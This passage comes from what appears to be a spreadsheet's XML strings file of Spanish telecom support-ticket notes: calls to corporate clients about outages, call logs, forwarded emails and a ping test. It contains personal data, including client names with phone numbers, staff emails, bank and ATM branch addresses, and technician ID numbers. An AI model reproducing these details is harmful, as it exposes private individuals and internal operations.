    <t>SE LLAMA A CLEINTE CLAUDIA LOPEZ-77300050 INDICA QUE NO PUEDE REALIZAR LLAMADAS SALIENTES, EL LMENSAJE QUE DA ES QUE TIENE BLOQUEADO EL SERVICIO-- SE PROCEDE AV ERIFICAR SI CLIENTE POSEE  BLOQUEO ADMINSITRATIVO ##VIVO</t>
  </si>
  <si>
    <t>F4566472</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JIMY GONZALES 45740430 QUIEN FONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001151929</t>
  </si>
  <si>
    <t>COORDINADA VISITA TÉCNICA, ADICIONAL SE LLAMÓ/HABLÓ CON JIMMY GONZÁLEZ/CLIENTE 45740430 Y SE LE BRINDAN AVANCES DEL TICKET, CLIENTE SE RETIRA A LAS 17:00 HORAS</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JIMMY GONZALES QUIEN INDICA QUE EL ASMI54 NO SINCRONIZA.
SOLICITA VISITA TECNICA, NO SE NECESARIOS LOS PERMISOS DE INGRESO.
2001974131
COLA:
NOMBRE: A: 45740430
NÚMERO: 011 50245740430
DURACIÓN: 0:01:10
ESTADO: CONECTADA
DETALLES: +50245740430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 15:00:25</t>
  </si>
  <si>
    <t>F4566490</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE, JORGE LOPEZ QUIEN AUTORIZA CIERRE DE TICKET
2001973079
COLA:
NOMBRE: A: 23027110
NÚMERO: 011 50223027110
DURACIÓN: 0:01:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223027110
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 17/05/2022 14:58:08</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE  JOSE NAJERA EN PUNTO REMOTO, VALIDA SERVICIO OPERATIVO E INDICA QUE SE GENERÓ CORTE DE ENERGIA EN SITIO HACE UNO MINUTOS Y PROBABLEMENTE SE DEBA A ELLO LA CAIDA DEL SERVICIO
2001970859
COLA:
NOMBRE: A: 54380805
NÚMERO: 54380805
DURACIÓN: 0:02:17
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54380805
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 17/05/2022 14:52:06</t>
  </si>
  <si>
    <t>F4566500</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE DIEGO DIAZ SOLICITA AVANCES, SE VERIFICA ULTIMA CRONOLOGIA DEL 17/05/2022 15:40:58 SERVICIO ALCANZABLE, SIN PERDIDAS Y CON TIEMPOS EN RANGO, SE CONTACTA A GESTOR ALEJANDRO ID: 3001013842, SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE ESCRIBE PARA CONFIRMAR EL MONITOREO Y SE LE RESPONDE*/*/*/*SE LE NOTIFICA A GESTOR FRANCISCO.QUEZADA POR SKYPE PARA EL CAMBIO DE ESTADO*/*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 14:47
PARA: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; INCIDENTES INFRAESTRUCTURA &lt;IPINFRA@GTC.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ASI CC TELECOMUNICACIONES &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO ID 7800096 AG068 JOYABAJ
BUENAS TARDES DENIS,
            DANDO SEGUIMIENTO A SU CASO, COMO LO CONVERSAMOS VÍA TELEFÓNICA HEMOS PROGRAMADO EL MONITOREO DE SU SERVICIO PARA FINALIZAR MAÑANA 20/05/2022 A LAS 12:00PM SEGÚN SU SOLICITUD, AL FINALIZAR EL PERÍODO LE NOTIFICAREMOS.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-----------------------------------------------------------------------------------------------------
DE: DENIS SICA [MAILTO:DSICA@GTC.COM.GT]
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 14:41
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; INCIDENTES INFRAESTRUCTURA &lt;IPINFRA@GTC.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ASI CC TELECOMUNICACIONES &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO ID 7800096 AG068 JOYABAJ
BUENA TARDE,
ESTIMADOS CLARO, LES COMENTO QUE SE ESTARÁN REALIZANDO PRUEBAS EN NUESTROS EQUIPOS EL DÍA DE HOY POR LO QUE SOLICITAMOS MANTENGAN ESTE REPORTE AÚN EN MONITOREO. POSTERIOR A LAS MODIFICACIONES NECESITAMOS DESCARTAR LAS CAÍDAS QUE HEMOS TENIDO.
MAÑANA ALREDEDOR DEL MEDIODÍA PODRIAS CONFIRMAR.</t>
  </si>
  <si>
    <t>F4566516</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA PARA CONFIRMAR LO REPORTADO SIN EMBARGO SEGUN INFORMACION DEL REPORTE CLIENTE TIENE PROBLEMAS DE INTERFERENCIA ENTRE LLAMADAS ENTRANTES Y SALIENTES EXTERNAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EDGAR ABREGO 25265721 - 70696479
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566520</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 17 DE MAYO DE 2022 14:51PARA: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_GMG_GT_INTERNET_Z0_MELCHOR_MENCOS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6520
ID: 313900273T
IDENTIFICADOR DEL CLIENTE:  CC_GMG_GT_INTERNET_Z0_MELCHOR_MENCOS_PETEN
UBICADO EN:  CALLE PRINCIPAL ZONA 0 MELCHOR DE MENCOS PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566549</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE JAIME CRUZ AL 24299600 CONTESTA LA SEÑORITA EVELIN QUIEN INDICA QUE A LAS 8:00 AM EMPIEZAN A ATENDER QUE SE LE LLAME A ESA HORA PARA QUE PUEDA COMUNICAR AL SEÑOR JAIME Y YA NO BRINDA MAS INFORMACION **
ID 3001055759
**</t>
  </si>
  <si>
    <t>F4566550</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALFREDO CHARUK, AL 56999859  CONFIRMA SERVICIO ESTABLE Y OPERATIVO.
AUTORIZA CIERRE DEL TICKET **
ID 3001125235
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ALFREDO CHARUK , INDICA QUE SE APLICO REINICIO A LOS EQUIPOS
NÚMERO: 56999859
FIN: HOY, 15:16
ID DE LLAMADA: 2001979523</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ALFREDO CHARUK, QUIEN INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO  E INDICA QUE LO OBSERVA INESTABLE, SE LE MENCIONA QUE LOS  TIEMPOS A NIVEL WAN SON UN PROMEDIO DE 2 MILISEGUNDOS, SOLILICITA QUE SE LE CAMBIE A MONITOREO PARA EL DIA DE MAÑANA A LAS 9:30 HORAS.
NÚMERO: 56999859
FIN: HOY, 15:39
ID DE LLAMADA: 2001987611
&lt;RTLHGTRUN1D2C02B03EIM1&gt;PING -C 500 -M 30 -B -S 1500 -VPN SERVICIOSCM 10.78.92.60
  PING 10.78.92.60: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.92.60 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/15 MS</t>
  </si>
  <si>
    <t>F4566558</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE HERNANDEZ 58652751 MENCIONA QUE NO ESTA DE ACUERDO CON EL DIAGNOSTICO Y QUE NECESITA SE VALIDE SI NO SE VIO AFECTADO POR UNA MASIVA QUE SE TUVO EN LA ZONA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001992458</t>
  </si>
  <si>
    <t>F4566559</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
MAR 17/05/2022 5:04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2399¿¿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6559¿¿
ID: 47501961T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2399
UBICADO EN:
CAJERO 2399 FARMACIA BATRES, 2 AV. 3-02 ZONA 1 MALACATAN TERMINAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566577</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR MARCO PORRAS AL 55312227 ID 3001683306 / 3001683763 PARA EL SEGUIMIENTO DONDE COMENTA QUE EL SERVICIO LO VE ESTABLE Y SE PUEDE PROCEDER CON EL CIERRE DEL TICKET, SE LE NOTIFICA AL GESTOR A CARGO YENSI.CALGUA VÍA SKYPE PARA EL CIERRE DE LA FALLA</t>
  </si>
  <si>
    <t>*/*/*/SEÑOR MARCO SE COMUNICA PARA ASISTENCIA YA QUE HIZO LAS PRUEBAS QUE SE LE SOLICITARON Y AÚN NO TIENE SERVICIO, SE CONTACTA AL GESTOR ALEJANDRO.NAVARRO 22245386 ID: 3001006626 VALIDA E INDICA QUE ESTA CAÍDO, POR LO QUE SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 55312227 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MARCO ROSAS/CLIENTE 55312227 INDICA QUE SEGUIRÁ CON SUS PRUEBAS INTERNAS, PIDE SE LE LLAME EN UNA HORA O BIEN LLAMARÁ PARA VALIDAR SI TODO OK.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ROJAS AL 55312227 CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 3001126196
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROJAS 55312227 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001278465</t>
  </si>
  <si>
    <t>SE LLAMA A MARCO QUIEN SE LE INDICA QUE AUN SE OBSERVA RED LAN CAIDO,. INDICA QUE ESTARA VALIDANDO POR LO QUE SOLICITA QUE SE DEVUELVA LA LLAMADA A LAS 17:00 HORAS---</t>
  </si>
  <si>
    <t>F4566579</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO AL 41203310 INDICA QUE ESTA EN PR SE TRATA DE CONTACTAR A GESTOR PERO SE ENCUENTRA EN OTRA LLAMADA || SE LE INFORMA A CLIENTE QUE SE LE DEVOLVERA LLAMADA Y SE LE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
ID 2001005286
**
**</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL SOLICITANDO CONTACTOS O APOYO PARA LAS PRUEBAS --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 03:06
PARA: SOPORTE INNOVA TELECOMUNICACIONES &lt;SOPORTE@INNOVATELCO.NET&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: APERTURA DE TICKET
BUENOS DÍAS ESTIMADO SR. BENITEZ.
                RESPECTO AL SEGUIMIENTO DEL TICKET SD1126465, PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS CON EQUIPOS EN SITIO SIN EMBARGO NO SE HA PODIDO UBICAR AL PERSONAL EN PUTO REMOTO.
PODRÍA APOYARNOS EN INDICAR UN CONTACTO ADICIONAL O REALIZANDO CONFERENCIA CON ELLOS PARA REALIZAR LOS DESCARTES DE PRIMER NIVEL.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
ESTIMADOS PROVEEDORES, BUENAS NOCHES.
CON EL SEGUIMIENTO DEL CASO ID #863400020 SUCURSAL 423 - CHAMPERICO, SOLICITAMOS ESCALAR PARA REALIZAR DIAGNÓSTICOS LÓGICOS Y FÍSICOS DEL SERVICIO, YA QUE EN LA ÚLTIMA MILLA SE VE AFECTACIÓN DE CAÍDA TOTAL.
SOLICITAMOS DE SU COLABORACIÓN EN PROPORCIONARNOS DATOS LÓGICOS DEL ENLACE Y SI ES POSIBLE VISITA TÉCNICA PARA MAÑANA EL HORARIO DE ATENCIÓN ES DE 08:00 HORAS A 17:00 HORAS DE LUNES A VIERNES.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4566585</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENRIQUE 42797078 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001108691</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FAJARDO 58359380 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001996843</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN FAJARDO AL 58359380 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
ID 3001006849
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 58359380 PARA SEGUIMIENTO, NO CONTESTA; CENTRAL 41549528 TAMPOCO LO HACE, SE DEBE INTENTAR MÁS TARDE O BIEN HASTA EL DÍA DE MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FAJARDO 58359380 MENCIONA QUE SE LLAME A PR ENRIQUE 42797078
-ID 58359380</t>
  </si>
  <si>
    <t>F4566602</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELIM VELARDE 85290825 PARA SOLICITAR EL CORREO --  SELIM.VELARDE@WSP.ORG  ---
-ID 3001216042</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SELIM VELARDE 85290825 SOLICITA SE PUEDA ENVIAR POR CORREO LAS PRUEBAS DEL DIAGNOSTICO
-ID 3001214157</t>
  </si>
  <si>
    <t>SE LLAMA A SELIM  8529-0825 PARA INFORMARLE QUE NO SE PRESENTO INCONVENIENTES EN LA RED DE CLARO, SE VALIDA QAUE SERVICIO REDUNDANTE TAMBIEN SE ENCUENTRA ACTIVO. SIN EMBARGO NO RESPONDE---</t>
  </si>
  <si>
    <t>F4566609</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE BYRON PEREZ 30621839 MENCIONA PERSISTE EL INCONVENIENTE, SE SOLICITA DATOS DE VISITA
-ID 3001126885
NOMBRE DEL CLIENTE: BANCO DE DESARROLLO RURAL, S.A.
UBICACIÓN: CABECERA MUNICIPAL SAN JUAN ATITAN, HUEHUETENANGO
CONTACTO EN SITIO:  BYRON PEREZ 30621839
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO A LA CENTRAL</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON PEREZ AL 30621839 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001007637
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 30621839 PARA SEGUIMIENTO, NO CONTESTA; CENTRAL 25041690 TAMPOCO LO HACE, SE DEBE INTENTAR MÁS TARDE O BIEN HASTA EL DÍA DE MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4566616</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA PROGRAMAR LA VISITA PARA MAÑAÑA A LAS 8 AM
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:06
PARA: J.TORRES@INDES.GOB.SV &lt;J.TORRES@INDES.GOB.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | INSTITUTO NACIONAL DE LOS DEPORTES DE EL SALVADOR |ID1106047SV | COLONIA MINERVA FINAL CALLE ¿LOS VIVEROS¿ CONTIGUO A PARQUE ¿SABURO HIRAO¿, BARRIO SAN JACINTO, SAN SALVADOR, SAN SALVADOR
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO INSTITUTO NACIONAL DE LOS DEPORTES DE EL SALVADOR  |ID1106047SV | COLONIA MINERVA FINAL CALLE  ¿LOS VIVEROS¿ CONTIGUO A PARQUE ¿SABURO HIRAO¿, BARRIO SAN JACINTO, SAN SALVADOR, SAN SALVADOR
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DÍA DE MAÑANA 18/05/2022 A LAS 8 AM.
TECNICO:
02400310-1     3796          EDGAR MAURICIO MONTOYA SANCHEZ
02878871-1     2437          JOSE ALFREDO JIMENEZ
00157708-4     4690          ABRAHAM SAMUEL PEREZ
00580847-9     2181          CARLOS EDUARDO GOMEZ  ZELEDON
00354722-1    4378            RONAL MOREL CRESPIN
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4566635</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IRMA CARTAGENA 76260434 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001239609</t>
  </si>
  <si>
    <t>F4566655</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANNIE JOELY ALVARADO 31772084 MENCIONA QUE ESTARA REALIZANDO PRUEBAS Y RESPONDERA POR CORREO APROX A LAS 15 HRS
-ID 1001580099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANNIE JOELY ALVARADO 31772084 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001576360</t>
  </si>
  <si>
    <t>F4566660</t>
  </si>
  <si>
    <t>SE CONFIRMA CON EL CLIENTE AL 22730705   QUE ALGUNAS LLAMADAS ENTRAN SIN AUDIO, SE TIENE QUE ASOCIAR A LA FALLA MASIVA, LLAMADA DEL E1 COMPLETA SIN PROBLEMA. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4566664</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 47702296 RESPONDE LESTER MENCIONA QUE LOS EQUIPOS SI SE ENCUENTRAN ENERGIZADOS PERO EL INCONVENIENTE PERSISTE
SE SOLICITAN DATOS DE POSIBLE VISITA
-ID 3001028147
NOMBRE DEL CLIENTE: PAPA POLLO,  S.A. (XT)
UBICACIÓN: 4 CALLE 14-44 ZONA 1 ZACAPA
CONTACTO EN SITIO: ENCARGAD DE TURNO
HORARIO DE ATENCION:9:00 - 19:30
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>*** SE HABLA CON LESTER 47702296 (ID 3001037714), GERENTE DE LA SUCURSAL. INFORMA QUE SI EN EFECTO SE RETIRAN A LAS 19:30H POR LO QUE SOLICITA SE HAGAN PRESENTE A LAS 8H, YA QUE EN ESTE HORARIO YA HAY PERSONAL EN SITIO ***</t>
  </si>
  <si>
    <t>F4566674</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EBER PANIAGUA AL  30195636 NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001085790
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE LLAMÓ/HABLÓ CON LYNDA WUG/EJECUTIVA 54896646 SE LE PIDE APOYO CON ALGÚN TEL CLIENTE, ME BRINDA EL TEL EBER PANIAGUA/CLIENTE 30195636, LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EBER PANIAGUA AL  30195636 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001128540
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EBER PANIAGUA 30195636 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001065961</t>
  </si>
  <si>
    <t>F4566675</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO SANCHEZ AL 82377210 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001054955
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ALVARO SANCHEZ, QUIEN AUTORIZA CIERRE DE TICKET
3001174721
COLA:
NOMBRE: A: 0050582377210
NÚMERO: 0050582377210
DURACIÓN: 0:01:00
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050582377210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 18/05/2022 13:04:16</t>
  </si>
  <si>
    <t>F4566684</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 17 DE MAYO DE 2022 16:55PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_073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6684
ID: 8900830T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_0730
UBICADO EN:  GRAMEEN SAN PABLO 6 AVENIDA 3-29 COL. JUSTO RUFINO BARRIOS SAN PABLO SAN MARCOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566687</t>
  </si>
  <si>
    <t>**SE CONTACTA CON CLIENTE JULIO SAZ 22344244 SOLICITA QUE SE LE LLAME EN 15 MIN **
ID 3001086495
**</t>
  </si>
  <si>
    <t>SE LLAMO AL OTRO NUMERO QUE COLOCARON DEL CLIENTE PERO NO CONTESTAN 22344244
3001022993
COLA:
NOMBRE: A: 0050322344244
NÚMERO: 0050322344244
DURACIÓN: 0:00:38
ESTADO: MARCANDO
DETALLES: 0050322344244
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 17:31:09</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JULIO SAZ PERO NO CONTESTA.
3001022643, 3001022815,
COLA:
NOMBRE: A: 0050378514073
NÚMERO: 0050378514073
DURACIÓN: 0:00:22
ESTADO: MARCANDO
DETALLES: 0050378514073
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 17:29:19</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JULIO SAZ 22344244-78514073 PARA VALIDAR EL INCONVENIENTE EN EL SERVICIO, SIN EMBARGO CLIENTE NO REPONDE, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA A NINGUNO DE LOS DOS NUMEROS, SE ESTARA CONTACTANDO NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JULIO SAZ 22344244-78514073
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PARA CONSULTAR CUAL ES EL INCONVENIENTE EN EL SERVICIO, CLIENTE INDICA QUE TIENE PROBLEMAS CON LLAMADAS SALIENTES Y ENTRANTES UNICAMENTE CON ALGUNOS DID, NOS ENVIARA CORREO CON LA INFORMACION
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE CONTACTA CON CLIENTE JULIO SAZ 22344244  INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR  **
ID 3001130570
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JULIO SAZ 22344244-78514073 QUIEN INDICA QUE ESTARA VERIFICANDO CON EL AREA CORRECTA, SOLICITA LLAMADA EN 10 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JULIO BERNAL 78514073 INFORMA QUE DURANTE LA LLAMADA TUVO PROBLEMAS DE AUDIO, PERO EN ESTE MOMENTO YA NORMALIZO Y SUS OPERADORES YA NO HAY REPORTADO
3001192369
COLA:
NOMBRE: A: 0050378514073
NÚMERO: 0050378514073
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:01:21
DETALLES: 0050378514073
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 18/05/2022 14:00:55</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JULIO SAZ 22344244-78514073 QUIEN INDICA QUE NO HA PRESENTADO PROBLEMAS EN EL SERVICIO DE CORTES DE LLAMADAS O DE PERDIDA DE AUDIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566705</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME MIRANDA 66138333 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001241905</t>
  </si>
  <si>
    <t>F4566742</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALBERTO SUAZO, INDICA QUE ESTARA APLICANDO REINICIO PERO NO SE ENCUENTRA EN SITIO POR LO QUE SOLICITARA A ALGUIEN EN PUNTO REMOTO PARA APOYO Y QUE SE LE LLAME NUEVAMENTE EN 10 MINUTOS
3001109916
COLA:
NOMBRE: A: 0050431508887
NÚMERO: 0050431508887
DURACIÓN: 0:01:22
